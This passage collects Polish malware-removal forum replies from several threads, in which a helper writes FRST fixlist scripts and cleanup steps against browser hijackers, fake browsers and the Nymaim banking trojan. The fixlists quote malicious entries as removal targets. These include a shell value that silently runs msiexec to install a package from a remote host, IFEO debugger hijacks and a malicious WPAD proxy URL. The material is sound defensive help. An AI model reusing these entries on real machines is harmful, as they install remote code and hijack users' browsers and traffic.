TVicPort; Brak ImagePath U3 a2mt7ru3; C:\Windows\System32\Drivers\a2mt7ru3.sys [0 ] (Advanced Micro Devices) S3 cpuz138; \??\C:\Users\Saszka\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] R1 ESProtectionDriver; \??\C:\Windows\system32\drivers\mbae64.sys [X] S3 MBAMFarflt; \??\C:\Windows\system32\drivers\farflt.sys [X] S3 MBAMProtection; \??\C:\Windows\system32\drivers\mbam.sys [X] S3 MBAMWebProtection; \??\C:\Windows\system32\drivers\mwac.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Users\Saszka\AppData\Local\Boxbob RemoveDirectory: C:\Users\Saszka\AppData\Roaming\Boxbob C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin\Origin Error Reporter.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HyperTerminal Private Edition\Uninstall HyperTerminal.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Pro\Uninstall.lnk C:\Users\Saszka\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk C:\Users\Sylwia\Desktop\Continue PRO100 installation.lnk C:\Users\Sylwia\Desktop\Sylwia\Gry\Heroes.III.Złota.Edycja.PL.CD2.lnk C:\Users\UpdatusUser\Desktop\Download Accelerator Plus (DAP).lnk C:\Users\UpdatusUser\Desktop\My DAP Downloads.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Saszka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Saszka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). zoohari;boxbob;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

To co dzieję się na forum jest patologiczne. To jest 25 temat (w ciągu 2 miesięcy!) z dokładnie takimi samymi przypadkami infekcji. Ehh... Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. Tyle prosimy o używanie oprogramowania zabezpieczającego oraz przeczytania artykułu szefowej: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {7059FA19-9555-4BD3-82FC-62BB24E037B0} - \PowerWord-SCT-JT -> No File FirewallRules: [{EC64E54A-EEC4-4809-BE0C-3297B21A54A3}] => (Allow) C:\Program Files (x86)\Dayglad\Application\chrome.exe FirewallRules: [{A99FBE2E-9D2A-41C0-9DA6-9EE056BD0968}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{DD66645C-CBB2-435D-B02F-29D1EEA18A7F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Dayglad RemoveDirectory: C:\Users\Arekcipa\AppData\Roaming\Dayglad RemoveDirectory: C:\Users\Arekcipa\AppData\Local\Dayglad RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Local\Firefox HKU\S-1-5-19\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-20\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-21-1375163193-2629173629-2764439304-1001\...\Run: [background_fault] => C:\Users\PAUL\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) C:\Users\PAUL\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-1375163193-2629173629-2764439304-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKU\S-1-5-21-1375163193-2629173629-2764439304-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-1375163193-2629173629-2764439304-1001 -> {D06DC6CD-B472-42C3-AB78-A57BF968D205} URL = Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718706&z=88d84c001f4b1f3960a3f9cgczbt2c0m8g9b1m8g2z&from=ypid&uid=TOSHIBAXMQ01ABD100_6357P3XATXX6357P3XAT&q={searchTerms} CHR DefaultSearchKeyword: Default -> ourluckysites R1 {a3f28269-ad17-41a8-b032-3e0313ef8979}Gw64; C:\WINDOWS\System32\drivers\{a3f28269-ad17-41a8-b032-3e0313ef8979}Gw64.sys [61016 2014-06-06] (StdLib) S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] U3 pxrdapod; \??\C:\Users\PAUL\AppData\Local\Temp\pxrdapod.sys [X] EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). dayglad;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

OK.

Wszystko pomyślnie wykonane (aczkolwiek nie włączyłeś Przywracania systemu - ale daruję już Ci to). Aktualnie wygląda to już w porządku. Jak oceniasz obecną sytuację?

To dokończcie to najpierw, system zostawiam na koniec.

Trudno bym odpisywał 24 godziny na dobę. Instrukcję będą sprecyzowane w takiej formie, że na pewno Sobie poradzisz. Są podstawione dwa prefabrykowane przeglądarki podszywające się pod Google Chroem oraz Mozilla FireFox. Oprócz tego wspomniany BigFarm zainfekował skróty przeglądarek. Amerykański adres ustawiony na routerze wydaję się być podejrzany (KLIK) - podaje instrukcje do zmiany. Wygląda na to, że szybko się z tym uporamy. P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK. 1. Przez panel sterowania odinstaluj: Zbędniki / Przestarzałe oprogramowanie: Spybot - Search & Destroy. 2. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Footjane RemoveDirectory: C:\Users\Ben\AppData\Roaming\Footjane RemoveDirectory: C:\Users\Ben\AppData\Local\Footjane C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 FirewallRules: [{DBEC1BB9-D594-4454-96FB-8C6E5E41D94D}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Ben\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Ben\AppData\Local\Firefox RemoveDirectory: C:\Program Files (x86)\Firefox FirewallRules: [{3567C494-B371-44EE-A8B6-9433F3F3BAE9}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMjq2RkM1RWVQOWZLMTE8FTk2MdY3MdF1MdYdFdqcNc== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [104448 2017-05-15] (TODO: ) [brak podpisu cyfrowego] S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X] C:\ProgramData\Microsoft\AppV\setup\install.dll C:\ProgramData\Apple\Common\Cloud\WinHelper.dll U3 uxrirpow; \??\C:\Users\Ben\AppData\Local\Temp\uxrirpow.sys [X] C:\Users\Ben\Dysk Google\OFERTY BEN\SkyDrive.lnk C:\Users\Ben\Dysk Google\EMCS\EMCS Offline Generator.lnk C:\Users\Ben\Dysk Google\EMCS\Protektor.lnk C:\Users\Ben\Dysk Google\EMCS\Nowy EMCS\EMCS Offline Generator.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Ben\AppData\Local\Mozilla\Firefox C:\Users\Ben\AppData\Roaming\Mozilla\Firefox C:\Users\Ben\AppData\Roaming\Profiles CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). footjane;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Tak - z poziomu HitmanPro. W mojej opini w takim przypadku lepiej zrobić format. To nie jest pierwszy lepszy wirus, a zaawansowany szkodliwy kod. Nawet jeśli z poziomu bootowalnego udałoby się usunąć infekcję to nie wiadomo czy w całości.

Z logów moderacyjnych wynika, że chyba temat jest opuszczony, ale jednak gdyby tak nie było to proszę o nowy zestaw raportów FRST oraz GMER. P.S: Temat założony w złym dziale, dlatego nie odpowiadałem, bo nie zauważyłem. Przenoszę do działu pomocy doraźnej.

Nie, to wątpliwy twór i nie zalecany. Te biblioteki i pliki systemowe nie są nigdzie sprawdzane, mogą być zarażone. Za cytuję specjalistkę, moją szefową wyróżnioną przez Microsoft: Proszę nie próbować: - Szukać i pobierać plików do zamiany na Google. Nazwa pliku i jego wersja podstawowa to za mało danych. Jest wymagana identyczna wersja komponentu o określonej sumie kontrolnej. - Używać cudacznych programów wątpliwej reputacji typu DLLFixer. Można zaszkodzić sobie i pogłębić usterkę. Wykryto preferencje Chromium: [C:\Users\kacpe\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - hxxp://www.oursurfing.com/?type=hppp&ts=1438755231&z=b14f3fcd9619b7b5d84448egfz8c8b4occ6qcbdc5g&from=amt&uid=KINGSTON Wykryto preferencje Chromium: [C:\Users\kacpe\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - hxxp://www.oursurfing.com/?type=hppp&ts=1438755231&z=b14f3fcd9619b7b5d84448egfz8c8b4occ6qcbdc5g&from=amt&uid=KINGSTO Zainfekowane są preferencję. Nie jestem zwolennikiem w grzebaniu w preferencjach przeglądarki, więc zalecam kompleksowo reinstalację przeglądarki. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. Po tym działaniu powiedz mi czy problem ustąpił, bo raporty oprócz w/w modyfikacji wyglądają już w porządku. uBlock Origin wg mojej opinii i wielu innych specjalistów jest bardziej wydajny, stabilny i skuteczny.

HKU\S-1-5-21-2882476764-1616236546-509559111-1000\...\Run: [parallel-3] => C:\ProgramData\parallel-36\parallel-47.exe [691200 2017-05-14] () HKU\S-1-5-21-2882476764-1616236546-509559111-1000\...\RunOnce: [handover-2] => C:\Users\DG_Ochota\AppData\Roaming\handover-7\handover-57.exe [515584 2017-05-13] () Nawrót infekcji pomimo jej usunięcie sugeruje, że nie będzie łatwo usunąć ją z poziomu systemu. To jedyne co jest do korekty w systemie, reszta jest OK (te dwa zagrożenia w HitmanPro daj do kasacji, detekcja FRST to fałszywy alarm). Nie będę ukrywał, że w przypadku tak poważnej infekcji zaleciłbym format. Powiedz mi czy godzisz się na to czy próbujemy leczyć system z poziomu bootowalnego? Tutaj zachodzi to zjawisko kiedy proces obfuskacja jest zaporą nie do przejścia z poziomu systemu.

Szału nie ma Doszło do modyfikacji ustawień serwera proxy i te zostały ustawione na szkodliwe. Po za tym ustawienia w kluczu wyszukiwarek również są nie za ciekawie. Szybko to uprzątniemy. 1. Włącz przywracanie systemu. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [AllowLegacyWebView] 1 HKLM\...\Policies\Explorer: [AllowUnhashedWebView] 1 AutoConfigURL: [s-1-5-21-2138453097-3351955104-4174952314-1001] => hxxp://unstop.net/wpad.dat?c785bf80f716b088df8b387b0514ddd430525880 ManualProxies: 0hxxp://unstop.net/wpad.dat?c785bf80f716b088df8b387b0514ddd430525880 HKU\S-1-5-21-2138453097-3351955104-4174952314-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.hulusearch.com/ DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Skubisz PC\AppData\Local\Mozilla C:\Users\Skubisz PC\AppData\Roaming\Mozilla C:\Users\Skubisz PC\AppData\Roaming\Profiles RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Usługi są uszkodzone i to poważnie, - musisz mi dać czas na rozpisanie rekonstrukcji. Reszta wygląda już w porządku.

Wdrażam poprawki dot. infekcji i z nimi chyba będziemy mieli już spokój. Pozostaje połączenia z internetem to, że nie możesz go włączyć normalnie (poprzez Panel sterowania) sugeruję uszkodzenia, więc poszerzam diagnostykę narzędziem FSS. Swoją drogą obstawiałem, że łańcuch sieciowy został uszkodzony jak to często bywa przy usuwaniu adware, ale jak widać chyba nie tym razem. Dodatkowo już wczoraj nie miałem czasu napisać: widać wyłączoną zaporę sieciową oraz usługę winmgmt (choć tworzenie punktów przywracania działa). Wydaję mi się, że one również mogą być uszkodzone - pobieram dane na ich temat z rejestru. 1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: RemoveDirectory: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah RemoveDirectory: HKEY_USERS\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Bagsarah RemoveDirectory: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox RemoveDirectory: HKEY_USERS\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Firefox U3 mfeavfk01; no ImagePath C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Help Manual.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Uruchom SystemLook, a następnie w białym, dużym oknie wklej: :reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mpsdrv /s HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\winmgmt /s Momentalnie wyskoczy raport - zaprezentuj go na forum. 4. Zrób raport z Farbar Service Scanner. 5. Zrób nowy zestaw raportów FRST i dostarcz plik Fixlog.

Nic po za troszkę zaśmieconą przeglądarką Google Chrome nie widać, ale myślę, że obecny jej stan może dać efekt nachalnych reklam. 1. Włącz przywracanie systemu. 2. Przez panel sterowania odinstaluj: Wątpliwe programy naprawcze: Dll-Files Fixer. 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] ShellIconOverlayIdentifiers: [iDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => -> Brak pliku GroupPolicy: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=hppp&ts=1438755231&z=b14f3fcd9619b7b5d84448egfz8c8b4occ6qcbdc5g&from=amt&uid=KINGSTONXSHFS37A120G_50026B724B08D49A CHR StartupUrls: Default -> "hxxp://www.oursurfing.com/?type=hppp&ts=1438755231&z=b14f3fcd9619b7b5d84448egfz8c8b4occ6qcbdc5g&from=amt&uid=KINGSTONXSHFS37A120G_50026B724B08D49A" C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Asystent uaktualnienia do systemu Windows 10.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\kacpe\AppData\Local\Mozilla C:\Users\kacpe\AppData\Roaming\Mozilla C:\Users\kacpe\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Reakcja systemu wykrywania zagrożeń zadziałała poprawnie - system jest zainfekowany przez infekcję bankową Nymaim - KLIK / KLIK. Zabezpieczenia uchroniły Cię przed kradzieżą - w przypadku tej infekcji wejście na stronę banku może się już okazać niebezpieczne. Z tego co wiem możesz powiadomić o zaistniałej sytuacji CERT ten Państwowy bądź ten drugi - http://www.cert.gov.pl/cer/zglaszanie-incydentu/16,Zglaszanie-incydentu.html, https://www.cert.pl/zglos-incydent/. Po dezynfekcji należy zmienić hasła w banku jak i we wszystkich innych serwisach logowania. Cofnij ostatnie przelewy (telefonicznie) jeśli zostały sfałszowane (podmiana numeru konta) - powtarzam o ile zostały źle wysłane i jeśli jest to możliwe. Przyszykuj urządzenia z pamięcią przenośną (infekcja chyba infekuję USB). Dezynfekcja: Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2882476764-1616236546-509559111-1000\...\Run: [molarity-4] => C:\ProgramData\molarity-3\molarity-3.exe [617472 2017-05-13] () HKU\S-1-5-21-2882476764-1616236546-509559111-1000\...\RunOnce: [vctcxo-35] => C:\Users\DG_Ochota\AppData\Roaming\vctcxo-26\vctcxo-5.exe [694784 2017-05-12] () HKU\S-1-5-21-2882476764-1616236546-509559111-1000\...\Winlogon: [shell] C:\ProgramData\anion-4\anion-5.exe -0,explorer.exe Startup: C:\Users\DG_Ochota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\maxton-1.lnk [2017-05-13] 